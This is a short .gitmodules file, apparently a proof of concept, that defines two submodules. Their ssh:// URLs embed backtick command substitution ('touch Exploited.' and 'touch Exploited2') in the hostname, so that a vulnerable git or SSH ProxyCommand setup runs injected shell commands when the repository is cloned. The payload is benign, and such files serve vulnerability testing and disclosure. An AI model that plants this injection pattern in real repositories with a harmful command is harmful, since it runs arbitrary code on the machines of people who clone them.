[submodule "cves"]
	path = cves
	url = ssh://`touch Exploited.`foo.example.com/bar
[submodule "poc-proxycommand-vulnerable2"]
	path = poc-proxycommand-vulnerable2
	url = ssh://`touch Exploited2`foo.example.com/bar
